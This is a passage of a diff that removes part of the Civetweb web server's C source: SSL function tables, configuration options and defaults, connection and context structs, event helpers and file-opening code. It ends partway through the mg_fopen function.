-#define BN_bn2hex (*(char *(*)(const BIGNUM *a))crypto_sw[20].ptr)
-#define ASN1_INTEGER_to_BN                                                     \
-	(*(BIGNUM * (*)(const ASN1_INTEGER *ai, BIGNUM *bn))crypto_sw[21].ptr)
-#define BN_free (*(void (*)(const BIGNUM *a))crypto_sw[22].ptr)
-#define CRYPTO_free (*(void (*)(void *addr))crypto_sw[23].ptr)
-
-#define OPENSSL_free(a) CRYPTO_free(a)
-
-/* set_ssl_option() function updates this array.
- * It loads SSL library dynamically and changes NULLs to the actual addresses
- * of respective functions. The macros above (like SSL_connect()) are really
- * just calling these functions indirectly via the pointer. */
-static struct ssl_func ssl_sw[] = {{"SSL_free", NULL},
-                                   {"SSL_accept", NULL},
-                                   {"SSL_connect", NULL},
-                                   {"SSL_read", NULL},
-                                   {"SSL_write", NULL},
-                                   {"SSL_get_error", NULL},
-                                   {"SSL_set_fd", NULL},
-                                   {"SSL_new", NULL},
-                                   {"SSL_CTX_new", NULL},
-                                   {"SSLv23_server_method", NULL},
-                                   {"SSL_library_init", NULL},
-                                   {"SSL_CTX_use_PrivateKey_file", NULL},
-                                   {"SSL_CTX_use_certificate_file", NULL},
-                                   {"SSL_CTX_set_default_passwd_cb", NULL},
-                                   {"SSL_CTX_free", NULL},
-                                   {"SSL_load_error_strings", NULL},
-                                   {"SSL_CTX_use_certificate_chain_file", NULL},
-                                   {"SSLv23_client_method", NULL},
-                                   {"SSL_pending", NULL},
-                                   {"SSL_CTX_set_verify", NULL},
-                                   {"SSL_shutdown", NULL},
-                                   {"SSL_CTX_load_verify_locations", NULL},
-                                   {"SSL_CTX_set_default_verify_paths", NULL},
-                                   {"SSL_CTX_set_verify_depth", NULL},
-                                   {"SSL_get_peer_certificate", NULL},
-                                   {"SSL_get_version", NULL},
-                                   {"SSL_get_current_cipher", NULL},
-                                   {"SSL_CIPHER_get_name", NULL},
-                                   {"SSL_CTX_check_private_key", NULL},
-                                   {"SSL_CTX_set_session_id_context", NULL},
-                                   {"SSL_CTX_ctrl", NULL},
-                                   {"SSL_CTX_set_cipher_list", NULL},
-                                   {"SSL_CTX_set_info_callback", NULL},
-                                   {"SSL_get_ex_data", NULL},
-                                   {"SSL_set_ex_data", NULL},
-                                   {NULL, NULL}};
-
-
-/* Similar array as ssl_sw. These functions could be located in different
- * lib. */
-static struct ssl_func crypto_sw[] = {{"CRYPTO_num_locks", NULL},
-                                      {"CRYPTO_set_locking_callback", NULL},
-                                      {"CRYPTO_set_id_callback", NULL},
-                                      {"ERR_get_error", NULL},
-                                      {"ERR_error_string", NULL},
-                                      {"ERR_remove_state", NULL},
-                                      {"ERR_free_strings", NULL},
-                                      {"ENGINE_cleanup", NULL},
-                                      {"CONF_modules_unload", NULL},
-                                      {"CRYPTO_cleanup_all_ex_data", NULL},
-                                      {"EVP_cleanup", NULL},
-                                      {"X509_free", NULL},
-                                      {"X509_get_subject_name", NULL},
-                                      {"X509_get_issuer_name", NULL},
-                                      {"X509_NAME_oneline", NULL},
-                                      {"X509_get_serialNumber", NULL},
-                                      {"i2c_ASN1_INTEGER", NULL},
-                                      {"EVP_get_digestbyname", NULL},
-                                      {"EVP_Digest", NULL},
-                                      {"i2d_X509", NULL},
-                                      {"BN_bn2hex", NULL},
-                                      {"ASN1_INTEGER_to_BN", NULL},
-                                      {"BN_free", NULL},
-                                      {"CRYPTO_free", NULL},
-                                      {NULL, NULL}};
-#endif /* OPENSSL_API_1_1 */
-#endif /* NO_SSL_DL */
-#endif /* NO_SSL */
-
-
-#if !defined(NO_CACHING)
-static const char *month_names[] = {"Jan",
-                                    "Feb",
-                                    "Mar",
-                                    "Apr",
-                                    "May",
-                                    "Jun",
-                                    "Jul",
-                                    "Aug",
-                                    "Sep",
-                                    "Oct",
-                                    "Nov",
-                                    "Dec"};
-#endif /* !NO_CACHING */
-
-/* Unified socket address. For IPv6 support, add IPv6 address structure in
- * the
- * union u. */
-union usa {
-	struct sockaddr sa;
-	struct sockaddr_in sin;
-#if defined(USE_IPV6)
-	struct sockaddr_in6 sin6;
-#endif
-};
-
-/* Describes a string (chunk of memory). */
-struct vec {
-	const char *ptr;
-	size_t len;
-};
-
-struct mg_file_stat {
-	/* File properties filled by mg_stat: */
-	uint64_t size;
-	time_t last_modified;
-	int is_directory; /* Set to 1 if mg_stat is called for a directory */
-	int is_gzipped;   /* Set to 1 if the content is gzipped, in which
-	                   * case we need a "Content-Eencoding: gzip" header */
-	int location;     /* 0 = nowhere, 1 = on disk, 2 = in memory */
-};
-
-struct mg_file_in_memory {
-	char *p;
-	uint32_t pos;
-	char mode;
-};
-
-struct mg_file_access {
-	/* File properties filled by mg_fopen: */
-	FILE *fp;
-	/* TODO (low): Replace "membuf" implementation by a "file in memory"
-	 * support library. Use some struct mg_file_in_memory *mf; instead of
-	 * membuf char pointer. */
-	const char *membuf;
-};
-
-struct mg_file {
-	struct mg_file_stat stat;
-	struct mg_file_access access;
-};
-
-#define STRUCT_FILE_INITIALIZER                                                \
-	{                                                                          \
-		{                                                                      \
-			(uint64_t)0, (time_t)0, 0, 0, 0                                    \
-		}                                                                      \
-		,                                                                      \
-		{                                                                      \
-			(FILE *) NULL, (const char *)NULL                                  \
-		}                                                                      \
-	}
-
-/* Describes listening socket, or socket which was accept()-ed by the master
- * thread and queued for future handling by the worker thread. */
-struct socket {
-	SOCKET sock;             /* Listening socket */
-	union usa lsa;           /* Local socket address */
-	union usa rsa;           /* Remote socket address */
-	unsigned char is_ssl;    /* Is port SSL-ed */
-	unsigned char ssl_redir; /* Is port supposed to redirect everything to SSL
-	                          * port */
-	unsigned char in_use;    /* Is valid */
-};
-
-/* NOTE(lsm): this enum shoulds be in sync with the config_options below. */
-enum {
-	CGI_EXTENSIONS,
-	CGI_ENVIRONMENT,
-	PUT_DELETE_PASSWORDS_FILE,
-	CGI_INTERPRETER,
-	PROTECT_URI,
-	AUTHENTICATION_DOMAIN,
-	ENABLE_AUTH_DOMAIN_CHECK,
-	SSI_EXTENSIONS,
-	THROTTLE,
-	ACCESS_LOG_FILE,
-	ENABLE_DIRECTORY_LISTING,
-	ERROR_LOG_FILE,
-	GLOBAL_PASSWORDS_FILE,
-	INDEX_FILES,
-	ENABLE_KEEP_ALIVE,
-	ACCESS_CONTROL_LIST,
-	EXTRA_MIME_TYPES,
-	LISTENING_PORTS,
-	DOCUMENT_ROOT,
-	SSL_CERTIFICATE,
-	SSL_CERTIFICATE_CHAIN,
-	NUM_THREADS,
-	RUN_AS_USER,
-	URL_REWRITE_PATTERN,
-	HIDE_FILES,
-	REQUEST_TIMEOUT,
-	KEEP_ALIVE_TIMEOUT,
-	LINGER_TIMEOUT,
-	SSL_DO_VERIFY_PEER,
-	SSL_CA_PATH,
-	SSL_CA_FILE,
-	SSL_VERIFY_DEPTH,
-	SSL_DEFAULT_VERIFY_PATHS,
-	SSL_CIPHER_LIST,
-	SSL_PROTOCOL_VERSION,
-	SSL_SHORT_TRUST,
-
-#if defined(USE_WEBSOCKET)
-	WEBSOCKET_TIMEOUT,
-#endif
-
-	DECODE_URL,
-
-#if defined(USE_LUA)
-	LUA_PRELOAD_FILE,
-	LUA_SCRIPT_EXTENSIONS,
-	LUA_SERVER_PAGE_EXTENSIONS,
-#endif
-#if defined(USE_DUKTAPE)
-	DUKTAPE_SCRIPT_EXTENSIONS,
-#endif
-
-#if defined(USE_WEBSOCKET)
-	WEBSOCKET_ROOT,
-#endif
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-	LUA_WEBSOCKET_EXTENSIONS,
-#endif
-
-	ACCESS_CONTROL_ALLOW_ORIGIN,
-	ACCESS_CONTROL_ALLOW_METHODS,
-	ACCESS_CONTROL_ALLOW_HEADERS,
-	ERROR_PAGES,
-	CONFIG_TCP_NODELAY, /* Prepended CONFIG_ to avoid conflict with the
-                     * socket option typedef TCP_NODELAY. */
-#if !defined(NO_CACHING)
-	STATIC_FILE_MAX_AGE,
-#endif
-#if !defined(NO_SSL)
-	STRICT_HTTPS_MAX_AGE,
-#endif
-#if defined(__linux__)
-	ALLOW_SENDFILE_CALL,
-#endif
-#if defined(_WIN32)
-	CASE_SENSITIVE_FILES,
-#endif
-#if defined(USE_LUA)
-	LUA_BACKGROUND_SCRIPT,
-	LUA_BACKGROUND_SCRIPT_PARAMS,
-#endif
-	ADDITIONAL_HEADER,
-	MAX_REQUEST_SIZE,
-	ALLOW_INDEX_SCRIPT_SUB_RES,
-
-	NUM_OPTIONS
-};
-
-
-/* Config option name, config types, default value */
-static struct mg_option config_options[] = {
-    {"cgi_pattern", CONFIG_TYPE_EXT_PATTERN, "**.cgi$|**.pl$|**.php$"},
-    {"cgi_environment", CONFIG_TYPE_STRING_LIST, NULL},
-    {"put_delete_auth_file", CONFIG_TYPE_FILE, NULL},
-    {"cgi_interpreter", CONFIG_TYPE_FILE, NULL},
-    {"protect_uri", CONFIG_TYPE_STRING_LIST, NULL},
-    {"authentication_domain", CONFIG_TYPE_STRING, "mydomain.com"},
-    {"enable_auth_domain_check", CONFIG_TYPE_BOOLEAN, "yes"},
-    {"ssi_pattern", CONFIG_TYPE_EXT_PATTERN, "**.shtml$|**.shtm$"},
-    {"throttle", CONFIG_TYPE_STRING_LIST, NULL},
-    {"access_log_file", CONFIG_TYPE_FILE, NULL},
-    {"enable_directory_listing", CONFIG_TYPE_BOOLEAN, "yes"},
-    {"error_log_file", CONFIG_TYPE_FILE, NULL},
-    {"global_auth_file", CONFIG_TYPE_FILE, NULL},
-    {"index_files",
-     CONFIG_TYPE_STRING_LIST,
-#ifdef USE_LUA
-     "index.xhtml,index.html,index.htm,"
-     "index.lp,index.lsp,index.lua,index.cgi,"
-     "index.shtml,index.php"},
-#else
-     "index.xhtml,index.html,index.htm,index.cgi,index.shtml,index.php"},
-#endif
-    {"enable_keep_alive", CONFIG_TYPE_BOOLEAN, "no"},
-    {"access_control_list", CONFIG_TYPE_STRING_LIST, NULL},
-    {"extra_mime_types", CONFIG_TYPE_STRING_LIST, NULL},
-    {"listening_ports", CONFIG_TYPE_STRING_LIST, "8080"},
-    {"document_root", CONFIG_TYPE_DIRECTORY, NULL},
-    {"ssl_certificate", CONFIG_TYPE_FILE, NULL},
-    {"ssl_certificate_chain", CONFIG_TYPE_FILE, NULL},
-    {"num_threads", CONFIG_TYPE_NUMBER, "50"},
-    {"run_as_user", CONFIG_TYPE_STRING, NULL},
-    {"url_rewrite_patterns", CONFIG_TYPE_STRING_LIST, NULL},
-    {"hide_files_patterns", CONFIG_TYPE_EXT_PATTERN, NULL},
-    {"request_timeout_ms", CONFIG_TYPE_NUMBER, "30000"},
-    {"keep_alive_timeout_ms", CONFIG_TYPE_NUMBER, "500"},
-    {"linger_timeout_ms", CONFIG_TYPE_NUMBER, NULL},
-
-    /* TODO(Feature): this is no longer a boolean, but yes/no/optional */
-    {"ssl_verify_peer", CONFIG_TYPE_BOOLEAN, "no"},
-
-    {"ssl_ca_path", CONFIG_TYPE_DIRECTORY, NULL},
-    {"ssl_ca_file", CONFIG_TYPE_FILE, NULL},
-    {"ssl_verify_depth", CONFIG_TYPE_NUMBER, "9"},
-    {"ssl_default_verify_paths", CONFIG_TYPE_BOOLEAN, "yes"},
-    {"ssl_cipher_list", CONFIG_TYPE_STRING, NULL},
-    {"ssl_protocol_version", CONFIG_TYPE_NUMBER, "0"},
-    {"ssl_short_trust", CONFIG_TYPE_BOOLEAN, "no"},
-#if defined(USE_WEBSOCKET)
-    {"websocket_timeout_ms", CONFIG_TYPE_NUMBER, "30000"},
-#endif
-    {"decode_url", CONFIG_TYPE_BOOLEAN, "yes"},
-
-#if defined(USE_LUA)
-    {"lua_preload_file", CONFIG_TYPE_FILE, NULL},
-    {"lua_script_pattern", CONFIG_TYPE_EXT_PATTERN, "**.lua$"},
-    {"lua_server_page_pattern", CONFIG_TYPE_EXT_PATTERN, "**.lp$|**.lsp$"},
-#endif
-#if defined(USE_DUKTAPE)
-    /* The support for duktape is still in alpha version state.
-     * The name of this config option might change. */
-    {"duktape_script_pattern", CONFIG_TYPE_EXT_PATTERN, "**.ssjs$"},
-#endif
-
-#if defined(USE_WEBSOCKET)
-    {"websocket_root", CONFIG_TYPE_DIRECTORY, NULL},
-#endif
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-    {"lua_websocket_pattern", CONFIG_TYPE_EXT_PATTERN, "**.lua$"},
-#endif
-    {"access_control_allow_origin", CONFIG_TYPE_STRING, "*"},
-    {"access_control_allow_methods", CONFIG_TYPE_STRING, "*"},
-    {"access_control_allow_headers", CONFIG_TYPE_STRING, "*"},
-    {"error_pages", CONFIG_TYPE_DIRECTORY, NULL},
-    {"tcp_nodelay", CONFIG_TYPE_NUMBER, "0"},
-#if !defined(NO_CACHING)
-    {"static_file_max_age", CONFIG_TYPE_NUMBER, "3600"},
-#endif
-#if !defined(NO_SSL)
-    {"strict_transport_security_max_age", CONFIG_TYPE_NUMBER, NULL},
-#endif
-#if defined(__linux__)
-    {"allow_sendfile_call", CONFIG_TYPE_BOOLEAN, "yes"},
-#endif
-#if defined(_WIN32)
-    {"case_sensitive", CONFIG_TYPE_BOOLEAN, "no"},
-#endif
-#if defined(USE_LUA)
-    {"lua_background_script", CONFIG_TYPE_FILE, NULL},
-    {"lua_background_script_params", CONFIG_TYPE_STRING_LIST, NULL},
-#endif
-    {"additional_header", CONFIG_TYPE_STRING_MULTILINE, NULL},
-    {"max_request_size", CONFIG_TYPE_NUMBER, "16384"},
-    {"allow_index_script_resource", CONFIG_TYPE_BOOLEAN, "no"},
-
-    {NULL, CONFIG_TYPE_UNKNOWN, NULL}};
-
-
-/* Check if the config_options and the corresponding enum have compatible
- * sizes. */
-mg_static_assert((sizeof(config_options) / sizeof(config_options[0]))
-                     == (NUM_OPTIONS + 1),
-                 "config_options and enum not sync");
-
-
-enum { REQUEST_HANDLER, WEBSOCKET_HANDLER, AUTH_HANDLER };
-
-
-struct mg_handler_info {
-	/* Name/Pattern of the URI. */
-	char *uri;
-	size_t uri_len;
-
-	/* handler type */
-	int handler_type;
-
-	/* Handler for http/https or authorization requests. */
-	mg_request_handler handler;
-
-	/* Handler for ws/wss (websocket) requests. */
-	mg_websocket_connect_handler connect_handler;
-	mg_websocket_ready_handler ready_handler;
-	mg_websocket_data_handler data_handler;
-	mg_websocket_close_handler close_handler;
-
-	/* accepted subprotocols for ws/wss requests. */
-	struct mg_websocket_subprotocols *subprotocols;
-
-	/* Handler for authorization requests */
-	mg_authorization_handler auth_handler;
-
-	/* User supplied argument for the handler function. */
-	void *cbdata;
-
-	/* next handler in a linked list */
-	struct mg_handler_info *next;
-};
-
-
-enum {
-	CONTEXT_INVALID,
-	CONTEXT_SERVER,
-	CONTEXT_HTTP_CLIENT,
-	CONTEXT_WS_CLIENT
-};
-
-
-struct mg_context {
-	volatile int stop_flag;        /* Should we stop event loop */
-	SSL_CTX *ssl_ctx;              /* SSL context */
-	char *config[NUM_OPTIONS];     /* Civetweb configuration parameters */
-	struct mg_callbacks callbacks; /* User-defined callback function */
-	void *user_data;               /* User-defined data */
-	int context_type;              /* See CONTEXT_* above */
-
-	struct socket *listening_sockets;
-	struct pollfd *listening_socket_fds;
-	unsigned int num_listening_sockets;
-
-	pthread_mutex_t thread_mutex; /* Protects (max|num)_threads */
-
-#ifdef ALTERNATIVE_QUEUE
-	struct socket *client_socks;
-	void **client_wait_events;
-#else
-	struct socket queue[MGSQLEN]; /* Accepted sockets */
-	volatile int sq_head;         /* Head of the socket queue */
-	volatile int sq_tail;         /* Tail of the socket queue */
-	pthread_cond_t sq_full;       /* Signaled when socket is produced */
-	pthread_cond_t sq_empty;      /* Signaled when socket is consumed */
-#endif
-
-	unsigned int max_request_size; /* The max request size */
-
-	pthread_t masterthreadid; /* The master thread ID */
-	unsigned int
-	    cfg_worker_threads;      /* The number of configured worker threads. */
-	pthread_t *worker_threadids; /* The worker thread IDs */
-	struct mg_connection *worker_connections; /* The connection struct, pre-
-	                                           * allocated for each worker */
-
-	time_t start_time; /* Server start time, used for authentication
-	                    * and for diagnstics. */
-
-	uint64_t auth_nonce_mask;    /* Mask for all nonce values */
-	pthread_mutex_t nonce_mutex; /* Protects nonce_count */
-	unsigned long nonce_count;   /* Used nonces, used for authentication */
-
-	char *systemName; /* What operating system is running */
-
-	/* linked list of uri handlers */
-	struct mg_handler_info *handlers;
-
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-	/* linked list of shared lua websockets */
-	struct mg_shared_lua_websocket_list *shared_lua_websockets;
-#endif
-
-#if defined(USE_TIMERS)
-	struct ttimers *timers;
-#endif
-
-#if defined(USE_LUA)
-	void *lua_background_state;
-#endif
-
-#if defined(USE_SERVER_STATS)
-	int active_connections;
-	int max_connections;
-	int64_t total_connections;
-	int64_t total_requests;
-	struct mg_memory_stat ctx_memory;
-	int64_t total_data_read;
-	int64_t total_data_written;
-#endif
-};
-
-
-#if defined(USE_SERVER_STATS)
-static struct mg_memory_stat mg_common_memory = {0, 0, 0};
-
-static struct mg_memory_stat *
-get_memory_stat(struct mg_context *ctx)
-{
-	if (ctx) {
-		return &(ctx->ctx_memory);
-	}
-	return &mg_common_memory;
-}
-#endif
-
-enum {
-	CONNECTION_TYPE_INVALID,
-	CONNECTION_TYPE_REQUEST,
-	CONNECTION_TYPE_RESPONSE
-};
-
-struct mg_connection {
-	int connection_type; /* see CONNECTION_TYPE_* above */
-
-	struct mg_request_info request_info;
-	struct mg_response_info response_info;
-
-	struct mg_context *ctx;
-
-#if defined(USE_SERVER_STATS)
-	int conn_state; /* 0 = undef, numerical value may change in different
-	                 * versions. For the current definition, see
-	                 * mg_get_connection_info_impl */
-#endif
-
-	SSL *ssl;                 /* SSL descriptor */
-	SSL_CTX *client_ssl_ctx;  /* SSL context for client connections */
-	struct socket client;     /* Connected client */
-	time_t conn_birth_time;   /* Time (wall clock) when connection was
-	                           * established */
-	struct timespec req_time; /* Time (since system start) when the request
-	                           * was received */
-	int64_t num_bytes_sent;   /* Total bytes sent to client */
-	int64_t content_len;      /* Content-Length header value */
-	int64_t consumed_content; /* How many bytes of content have been read */
-	int is_chunked;           /* Transfer-Encoding is chunked:
-	                           * 0 = not chunked,
-	                           * 1 = chunked, do data read yet,
-	                           * 2 = chunked, some data read,
-	                           * 3 = chunked, all data read
-	                           */
-	size_t chunk_remainder;   /* Unread data from the last chunk */
-	char *buf;                /* Buffer for received data */
-	char *path_info;          /* PATH_INFO part of the URL */
-
-	int must_close;       /* 1 if connection must be closed */
-	int accept_gzip;      /* 1 if gzip encoding is accepted */
-	int in_error_handler; /* 1 if in handler for user defined error
-	                       * pages */
-#if defined(USE_WEBSOCKET)
-	int in_websocket_handling; /* 1 if in read_websocket */
-#endif
-	int handled_requests; /* Number of requests handled by this connection
-	                         */
-	int buf_size;         /* Buffer size */
-	int request_len;      /* Size of the request + headers in a buffer */
-	int data_len;         /* Total size of data in a buffer */
-	int status_code;      /* HTTP reply status code, e.g. 200 */
-	int throttle;         /* Throttling, bytes/sec. <= 0 means no
-	                       * throttle */
-
-	time_t last_throttle_time;   /* Last time throttled data was sent */
-	int64_t last_throttle_bytes; /* Bytes sent this second */
-	pthread_mutex_t mutex;       /* Used by mg_(un)lock_connection to ensure
-	                              * atomic transmissions for websockets */
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-	void *lua_websocket_state; /* Lua_State for a websocket connection */
-#endif
-
-	int thread_index; /* Thread index within ctx */
-};
-
-
-/* Directory entry */
-struct de {
-	struct mg_connection *conn;
-	char *file_name;
-	struct mg_file_stat file;
-};
-
-
-#if defined(USE_WEBSOCKET)
-static int is_websocket_protocol(const struct mg_connection *conn);
-#else
-#define is_websocket_protocol(conn) (0)
-#endif
-
-
-#if !defined(NO_THREAD_NAME)
-#if defined(_WIN32) && defined(_MSC_VER)
-/* Set the thread name for debugging purposes in Visual Studio
- * http://msdn.microsoft.com/en-us/library/xcb2z8hs.aspx
- */
-#pragma pack(push, 8)
-typedef struct tagTHREADNAME_INFO {
-	DWORD dwType;     /* Must be 0x1000. */
-	LPCSTR szName;    /* Pointer to name (in user addr space). */
-	DWORD dwThreadID; /* Thread ID (-1=caller thread). */
-	DWORD dwFlags;    /* Reserved for future use, must be zero. */
-} THREADNAME_INFO;
-#pragma pack(pop)
-
-#elif defined(__linux__)
-
-#include <sys/prctl.h>
-#include <sys/sendfile.h>
-#ifdef ALTERNATIVE_QUEUE
-#include <sys/eventfd.h>
-#endif /* ALTERNATIVE_QUEUE */
-
-
-#if defined(ALTERNATIVE_QUEUE)
-
-
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunreachable-code"
-/* For every system, "(sizeof(int) == sizeof(void *))" is either always
- * true or always false. One of the two branches is unreachable in any case.
- * Unfortunately the C standard does not define a way to check this at
- * compile time, since the #if preprocessor conditions can not use the sizeof
- * operator as an argument. */
-#endif
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* GCC does not realize one branch is unreachable, so it raises some
- * pointer cast warning within the unreachable branch.
- */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wint-to-pointer-cast"
-#pragma GCC diagnostic ignored "-Wpointer-to-int-cast"
-#endif
-
-
-static void *
-event_create(void)
-{
-	int evhdl = eventfd(0, EFD_CLOEXEC);
-	int *ret;
-
-	if (evhdl == -1) {
-		/* Linux uses -1 on error, Windows NULL. */
-		/* However, Linux does not return 0 on success either. */
-		return 0;
-	}
-	if (sizeof(int) == sizeof(void *)) {
-		ret = (void *)evhdl;
-	} else {
-		ret = (int *)mg_malloc(sizeof(int));
-		if (ret) {
-			*ret = evhdl;
-		} else {
-			(void)close(evhdl);
-		}
-	}
-
-	return (void *)ret;
-}
-
-
-static int
-event_wait(void *eventhdl)
-{
-	uint64_t u;
-	int evhdl, s;
-
-	if (sizeof(int) == sizeof(void *)) {
-		evhdl = (int)eventhdl;
-	} else {
-		if (!eventhdl) {
-			/* error */
-			return 0;
-		}
-		evhdl = *(int *)eventhdl;
-	}
-
-	s = (int)read(evhdl, &u, sizeof(u));
-	if (s != sizeof(uint64_t)) {
-		/* error */
-		return 0;
-	}
-	(void)u; /* the value is not required */
-	return 1;
-}
-
-
-static int
-event_signal(void *eventhdl)
-{
-	uint64_t u = 1;
-	int evhdl, s;
-
-	if (sizeof(int) == sizeof(void *)) {
-		evhdl = (int)eventhdl;
-	} else {
-		if (!eventhdl) {
-			/* error */
-			return 0;
-		}
-		evhdl = *(int *)eventhdl;
-	}
-
-	s = (int)write(evhdl, &u, sizeof(u));
-	if (s != sizeof(uint64_t)) {
-		/* error */
-		return 0;
-	}
-	return 1;
-}
-
-
-static void
-event_destroy(void *eventhdl)
-{
-	int evhdl;
-
-	if (sizeof(int) == sizeof(void *)) {
-		evhdl = (int)eventhdl;
-		close(evhdl);
-	} else {
-		if (!eventhdl) {
-			/* error */
-			return;
-		}
-		evhdl = *(int *)eventhdl;
-		close(evhdl);
-		mg_free(eventhdl);
-	}
-}
-
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-#pragma GCC diagnostic pop
-#endif
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-
-#endif
-
-#endif
-
-
-#if !defined(__linux__) && !defined(_WIN32) && defined(ALTERNATIVE_QUEUE)
-
-struct posix_event {
-	pthread_mutex_t mutex;
-	pthread_cond_t cond;
-};
-
-
-static void *
-event_create(void)
-{
-	struct posix_event *ret = mg_malloc(sizeof(struct posix_event));
-	if (ret == 0) {
-		/* out of memory */
-		return 0;
-	}
-	if (0 != pthread_mutex_init(&(ret->mutex), NULL)) {
-		/* pthread mutex not available */
-		mg_free(ret);
-		return 0;
-	}
-	if (0 != pthread_cond_init(&(ret->cond), NULL)) {
-		/* pthread cond not available */
-		pthread_mutex_destroy(&(ret->mutex));
-		mg_free(ret);
-		return 0;
-	}
-	return (void *)ret;
-}
-
-
-static int
-event_wait(void *eventhdl)
-{
-	struct posix_event *ev = (struct posix_event *)eventhdl;
-	pthread_mutex_lock(&(ev->mutex));
-	pthread_cond_wait(&(ev->cond), &(ev->mutex));
-	pthread_mutex_unlock(&(ev->mutex));
-	return 1;
-}
-
-
-static int
-event_signal(void *eventhdl)
-{
-	struct posix_event *ev = (struct posix_event *)eventhdl;
-	pthread_mutex_lock(&(ev->mutex));
-	pthread_cond_signal(&(ev->cond));
-	pthread_mutex_unlock(&(ev->mutex));
-	return 1;
-}
-
-
-static void
-event_destroy(void *eventhdl)
-{
-	struct posix_event *ev = (struct posix_event *)eventhdl;
-	pthread_cond_destroy(&(ev->cond));
-	pthread_mutex_destroy(&(ev->mutex));
-	mg_free(ev);
-}
-#endif
-
-
-static void
-mg_set_thread_name(const char *name)
-{
-	char threadName[16 + 1]; /* 16 = Max. thread length in Linux/OSX/.. */
-
-	mg_snprintf(
-	    NULL, NULL, threadName, sizeof(threadName), "civetweb-%s", name);
-
-#if defined(_WIN32)
-#if defined(_MSC_VER)
-	/* Windows and Visual Studio Compiler */
-	__try
-	{
-		THREADNAME_INFO info;
-		info.dwType = 0x1000;
-		info.szName = threadName;
-		info.dwThreadID = ~0U;
-		info.dwFlags = 0;
-
-		RaiseException(0x406D1388,
-		               0,
-		               sizeof(info) / sizeof(ULONG_PTR),
-		               (ULONG_PTR *)&info);
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-	}
-#elif defined(__MINGW32__)
-/* No option known to set thread name for MinGW */
-#endif
-#elif defined(__GLIBC__)                                                       \
-    && ((__GLIBC__ > 2) || ((__GLIBC__ == 2) && (__GLIBC_MINOR__ >= 12)))
-	/* pthread_setname_np first appeared in glibc in version 2.12*/
-	(void)pthread_setname_np(pthread_self(), threadName);
-#elif defined(__linux__)
-	/* on linux we can use the old prctl function */
-	(void)prctl(PR_SET_NAME, threadName, 0, 0, 0);
-#endif
-}
-#else /* !defined(NO_THREAD_NAME) */
-void
-mg_set_thread_name(const char *threadName)
-{
-}
-#endif
-
-
-#if defined(MG_LEGACY_INTERFACE)
-const char **
-mg_get_valid_option_names(void)
-{
-	/* This function is deprecated. Use mg_get_valid_options instead. */
-	static const char *
-	    data[2 * sizeof(config_options) / sizeof(config_options[0])] = {0};
-	int i;
-
-	for (i = 0; config_options[i].name != NULL; i++) {
-		data[i * 2] = config_options[i].name;
-		data[i * 2 + 1] = config_options[i].default_value;
-	}
-
-	return data;
-}
-#endif
-
-
-const struct mg_option *
-mg_get_valid_options(void)
-{
-	return config_options;
-}
-
-
-/* Do not open file (used in is_file_in_memory) */
-#define MG_FOPEN_MODE_NONE (0)
-
-/* Open file for read only access */
-#define MG_FOPEN_MODE_READ (1)
-
-/* Open file for writing, create and overwrite */
-#define MG_FOPEN_MODE_WRITE (2)
-
-/* Open file for writing, create and append */
-#define MG_FOPEN_MODE_APPEND (4)
-
-
-/* If a file is in memory, set all "stat" members and the membuf pointer of
- * output filep and return 1, otherwise return 0 and don't modify anything.
- */
-static int
-open_file_in_memory(const struct mg_connection *conn,
-                    const char *path,
-                    struct mg_file *filep,
-                    int mode)
-{
-#if defined(MG_USE_OPEN_FILE)
-
-	size_t size = 0;
-	const char *buf = NULL;
-	if (!conn) {
-		return 0;
-	}
-
-	if ((mode != MG_FOPEN_MODE_NONE) && (mode != MG_FOPEN_MODE_READ)) {
-		return 0;
-	}
-
-	if (conn->ctx->callbacks.open_file) {
-		buf = conn->ctx->callbacks.open_file(conn, path, &size);
-		if (buf != NULL) {
-			if (filep == NULL) {
-				/* This is a file in memory, but we cannot store the
-				 * properties
-				 * now.
-				 * Called from "is_file_in_memory" function. */
-				return 1;
-			}
-
-			/* NOTE: override filep->size only on success. Otherwise, it
-			 * might
-			 * break constructs like if (!mg_stat() || !mg_fopen()) ... */
-			filep->access.membuf = buf;
-			filep->access.fp = NULL;
-
-			/* Size was set by the callback */
-			filep->stat.size = size;
-
-			/* Assume the data may change during runtime by setting
-			 * last_modified = now */
-			filep->stat.last_modified = time(NULL);
-
-			filep->stat.is_directory = 0;
-			filep->stat.is_gzipped = 0;
-		}
-	}
-
-	return (buf != NULL);
-
-#else
-	(void)conn;
-	(void)path;
-	(void)filep;
-	(void)mode;
-
-	return 0;
-
-#endif
-}
-
-
-static int
-is_file_in_memory(const struct mg_connection *conn, const char *path)
-{
-	return open_file_in_memory(conn, path, NULL, MG_FOPEN_MODE_NONE);
-}
-
-
-static int
-is_file_opened(const struct mg_file_access *fileacc)
-{
-	if (!fileacc) {
-		return 0;
-	}
-	return (fileacc->membuf != NULL) || (fileacc->fp != NULL);
-}
-
-
-static int mg_stat(const struct mg_connection *conn,
-                   const char *path,
-                   struct mg_file_stat *filep);
-
-
-/* mg_fopen will open a file either in memory or on the disk.
- * The input parameter path is a string in UTF-8 encoding.
- * The input parameter mode is MG_FOPEN_MODE_*
- * On success, either fp or membuf will be set in the output
- * struct file. All status members will also be set.
- * The function returns 1 on success, 0 on error. */
-static int
-mg_fopen(const struct mg_connection *conn,
-         const char *path,
-         int mode,
-         struct mg_file *filep)
-{
-	int found;
-
-	if (!filep) {
-		return 0;
-	}
-	filep->access.fp = NULL;
-	filep->access.membuf = NULL;
-
-	if (!is_file_in_memory(conn, path)) {
-
-		/* filep is initialized in mg_stat: all fields with memset to,
-		 * some fields like size and modification date with values */
-		found = mg_stat(conn, path, &(filep->stat));
-
-		if ((mode == MG_FOPEN_MODE_READ) && (!found)) {
-			/* file does not exist and will not be created */
-			return 0;
-		}
-
-#ifdef _WIN32
-		{
-			wchar_t wbuf[PATH_MAX];
-			path_to_unicode(conn, path, wbuf, ARRAY_SIZE(wbuf));
-			switch (mode) {
-			case MG_FOPEN_MODE_READ:
-				filep->access.fp = _wfopen(wbuf, L"rb");
-				break;
